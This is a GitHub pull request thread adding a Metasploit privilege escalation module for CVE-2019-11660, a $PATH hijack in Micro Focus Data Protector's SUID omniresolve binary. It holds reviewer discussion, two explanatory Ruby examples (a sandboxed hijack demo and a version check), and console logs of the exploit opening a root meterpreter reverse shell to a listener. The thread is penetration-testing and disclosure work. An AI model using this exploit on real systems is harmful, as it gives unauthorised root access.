
Add Linux Micro Focus (HPE) Data Protector Privilege Escalation Module (CVE-2019-11660) #12382

Merged
merged 12 commits into from Nov 1, 2019

Conversation


s7u55 commented Oct 1, 2019

Add Micro Focus (HPE) Data Protector Privilege Escalation Module (CVE-2019-11660).

  This module exploits the trusted $PATH environment
  variable of the SUID binary `omniresolve` in
  Micro Focus (HPE) Data Protector A.10.40 and prior.

  The `omniresolve` executable calls the `oracleasm` binary using
  a relative path and the trusted $PATH, which allows an attacker
  to execute a custom binary with `root` privileges.
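The weakness described above is a plain $PATH search: a privileged program that spawns a helper by bare name lets whoever controls $PATH decide which file with that name runs. The following Ruby script is an added illustration written for this page; it is not the Metasploit module and does not touch the vendor's `omniresolve` or `oracleasm` binaries. It builds two throwaway directories, a "trusted" one holding a constructed stand-in helper and a "rogue" one holding an attacker-supplied script of the same name, puts the rogue directory first in $PATH, and then compares a bare-name invocation (the vulnerable pattern) with an absolute-path invocation (the hardened one). The helper scripts, directory names and the `status` argument are all invented for the demonstration.

```ruby
require 'fileutils'
require 'open3'
require 'tmpdir'

# Stand-in for the privileged caller: it invokes its helper by bare name,
# so the $PATH search decides which "oracleasm" is actually executed.
# Returns the helper's trimmed stdout, or nil if nothing could be run.
def invoke_helper_by_name
  out, status = Open3.capture2('oracleasm', 'status')
  status.success? ? out.strip : nil
rescue Errno::ENOENT
  nil
end

# Hardened variant: an absolute path never consults $PATH.
def invoke_helper_by_abs_path(abs_path)
  out, status = Open3.capture2(abs_path, 'status')
  status.success? ? out.strip : nil
rescue Errno::ENOENT
  nil
end

# Runs the demonstration in a temporary directory and returns a hash with
# what each call style executed. $PATH is restored afterwards.
def path_hijack_demo
  Dir.mktmpdir('path-hijack-demo') do |dir|
    trusted = File.join(dir, 'trusted')
    rogue = File.join(dir, 'rogue')
    FileUtils.mkdir_p([trusted, rogue])

    # Constructed stand-in for the genuine helper (not the vendor's binary).
    File.write(File.join(trusted, 'oracleasm'), "#!/bin/sh\necho genuine\n")
    # Attacker-controlled file with the same name; in a real attack this is
    # where the payload would live.
    File.write(File.join(rogue, 'oracleasm'), "#!/bin/sh\necho hijacked\n")
    File.chmod(0o755, File.join(trusted, 'oracleasm'), File.join(rogue, 'oracleasm'))

    saved_path = ENV['PATH']
    begin
      # The attacker's directory is searched before the legitimate one.
      ENV['PATH'] = [rogue, trusted, saved_path].join(File::PATH_SEPARATOR)
      {
        by_name: invoke_helper_by_name,
        by_abs_path: invoke_helper_by_abs_path(File.join(trusted, 'oracleasm'))
      }
    ensure
      ENV['PATH'] = saved_path
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  p path_hijack_demo
end
```

The bare-name call picks up the rogue script while the absolute-path call still reaches the genuine helper. Note that the dynamic loader's secure-execution mode for set-user-ID programs ignores variables such as LD_PRELOAD and LD_LIBRARY_PATH, but it does nothing about $PATH, because the lookup is performed by the program itself (via execvp or a shell) rather than by the loader; the fix is the program's responsibility, either an absolute path or a sanitised $PATH before spawning helpers.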
@bcoles bcoles added docs module labels Oct 2, 2019
s7u55 and others added 6 commits Oct 2, 2019
Co-Authored-By: bcoles <bcoles@gmail.com>
@h00die h00die changed the title Add Privilege Escalation Module (CVE-2019-11660) Add Linux Micro Focus (HPE) Data Protector Privilege Escalation Module (CVE-2019-11660) Oct 2, 2019
Co-Authored-By: Valeri Melnikov <MelnikoffVA@yandex.ru>
bcoles approved these changes Oct 3, 2019

bcoles left a comment

LGTM. Ready for testing.

s7u55 commented Oct 3, 2019

Test against Micro Focus Data Protector 10.40

msf5 exploit(multi/handler) > use exploit/linux/local/omniresolve_suid_priv_esc
msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/omniresolve_suid_priv_esc) > show options

Module options (exploit/linux/local/omniresolve_suid_priv_esc):

   Name       Current Setting             Required  Description
   ----       ---------------             --------  -----------
   SESSION                                yes       The session to run this module on.
   SUID_PATH  /opt/omni/lbin/omniresolve  yes       Path to suid executable omniresolve


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Micro Focus (HPE) Data Protector <= 10.40 build 118


msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set lhost eth0

msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set session 1
session => 1

msf5 exploit(linux/local/omniresolve_suid_priv_esc) > check
[+] The target is vulnerable.
msf5 exploit(linux/local/omniresolve_suid_priv_esc) > run

[*] Started reverse TCP handler on 192.168.0.108:4444 
[*] Sending stage (3021284 bytes) to 192.168.0.110
[*] Meterpreter session 2 opened (192.168.0.108:4444 -> 192.168.0.110:36754) at 2019-10-03 14:37:43 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.0.110
OS           : CentOS 7.6.1810 (Linux 3.10.0-957.21.2.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

Test against Micro Focus Data Protector 10.50 (Patched version)

msf5 exploit(linux/local/omniresolve_suid_priv_esc) > exploit

[*] Started reverse TCP handler on 192.168.0.108:4444 
[-] omniresolve version 10.40 build 125 is not vulnerable
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/omniresolve_suid_priv_esc) > 

The vendor changed the omniresolve build, but not the version, in DP 10.50.

s7u55 commented Oct 29, 2019

The older versions are not available on the official website.
I can upload one somewhere if you need.

bcoles commented Oct 29, 2019

The older versions are not available on the official website.
I can upload one somewhere if you need.

Please do. If you don't want to make the link public, you can email myself and/or msfdev[at]metasploit.com .

s7u55 commented Oct 30, 2019

Please do. If you don't want to make the link public, you can email myself and/or msfdev[at]metasploit.com .

have you received the link?

bcoles commented Oct 31, 2019

have you received the link?

Yes, thanks, I'll take a look between now and Sunday (probably earlier). Please update the ForceExploit functionality, as per above, if you have time.

@bcoles bcoles self-assigned this Oct 31, 2019
bcoles commented Nov 1, 2019

Hi @s7u55

Tested successfully on CentOS 7 (x64).

I've made some small changes in c6e739c. I hope you're ok with the changes. Please let me know, else I'll proceed with landing this PR.

The changes mostly consist of:

  • minor formatting for module description
  • updating ForceExploit as discussed above
  • changed @ instance variables to local variables
  • appended echo to the cmd_exec call to fix a stupid bug related to framework command tokenisation #12485 (unrelated to this module) which caused the specified session to die if the session was a command shell session.
  • change print_ methods in check to vprint_
  • print the omniresolve version in check, regardless of whether the version is vulnerable
  • return Appears, rather than Vulnerable, as the vulnerability is inferred, rather than confirmed.
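The check logic described in the list above infers vulnerability from the version string rather than proving it, which is why it returns Appears instead of Vulnerable, and the earlier test run shows why build numbers matter: the patched 10.50 package still reported version 10.40, only with a higher build. The Ruby below is an added example written for this page, not the module's own code; it assumes that the version line can be reduced to a "<major>.<minor> build <n>" pair (the "omniresolve version 10.40 build 125" wording from the test output), and that the affected range is everything at or below 10.40 build 118, as stated by the module's target name. The function names are invented.

```ruby
require 'rubygems'

# Last affected version/build pair, taken from the module's target name
# "Micro Focus (HPE) Data Protector <= 10.40 build 118".
LAST_VULN_VERSION = Gem::Version.new('10.40')
LAST_VULN_BUILD = 118

# Extracts [Gem::Version, build] from a line such as
# "omniresolve version 10.40 build 125"; returns nil if the line does not
# carry a dotted version followed by "build <n>". A leading "A." product
# prefix is ignored because the regex only captures the numeric part.
def parse_omniresolve_version(line)
  m = line.match(/(\d+(?:\.\d+)+)\s+build\s+(\d+)/i)
  return nil unless m
  [Gem::Version.new(m[1]), m[2].to_i]
end

# true  -> version/build lies in the affected range
# false -> version/build is past the fix
# nil   -> could not parse, so nothing can be inferred
def omniresolve_vulnerable?(line)
  parsed = parse_omniresolve_version(line)
  return nil unless parsed
  version, build = parsed
  return true if version < LAST_VULN_VERSION
  # Same version line as the fixed release: only the build number separates
  # patched from unpatched, so it must be compared as well.
  version == LAST_VULN_VERSION && build <= LAST_VULN_BUILD
end

# Maps the inference onto the three outcomes a version-based check can
# honestly report: the vulnerability appears present, the target looks
# safe, or the check could not tell.
def omniresolve_check(line)
  case omniresolve_vulnerable?(line)
  when true then :appears
  when false then :safe
  else :unknown
  end
end

if __FILE__ == $PROGRAM_NAME
  ['omniresolve version 10.40 build 118',
   'omniresolve version 10.40 build 125',
   'omniresolve version 10.50 build 3',
   'no version here'].each do |l|
    puts "#{l.inspect} => #{omniresolve_check(l)}"
  end
end
```

Comparing with Gem::Version rather than as floats avoids the trap where "10.4" and "10.40" would compare equal or where "10.100" would sort below "10.40"; the separate build comparison is what lets the check distinguish the 10.50 package (version 10.40, build 125) from the affected 10.40 build 118.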
@bcoles bcoles removed the needs-testing label Nov 1, 2019
@bcoles
bcoles approved these changes Nov 1, 2019
s7u55 commented Nov 1, 2019

Hello.
That's perfect, thanks.

bcoles added a commit that referenced this pull request Nov 1, 2019
…rivesc (CVE-2019-11660)
@bcoles bcoles merged commit b08e031 into rapid7:master Nov 1, 2019
3 checks passed
Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed
bcoles commented Nov 1, 2019

Hello.
That's perfect, thanks.

Cool. Landed in master. Unfortunately I think we've missed the point release for this week. It will be in next week's release.

@bcoles bcoles added the rn-modules label Nov 1, 2019
msjenkins-r7 added a commit that referenced this pull request Nov 1, 2019
…rivesc (CVE-2019-11660)
bcoles commented Nov 1, 2019

Release Notes

Add Micro Focus (HPE) Data Protector Privilege Escalation module for CVE-2019-11660. This module exploits the omniresolve SUID root executable installed as part of Data Protector to gain root privileges by abusing a trusted $PATH.

@s7u55 s7u55 deleted the s7u55:add-omniresolve-module branch Nov 2, 2019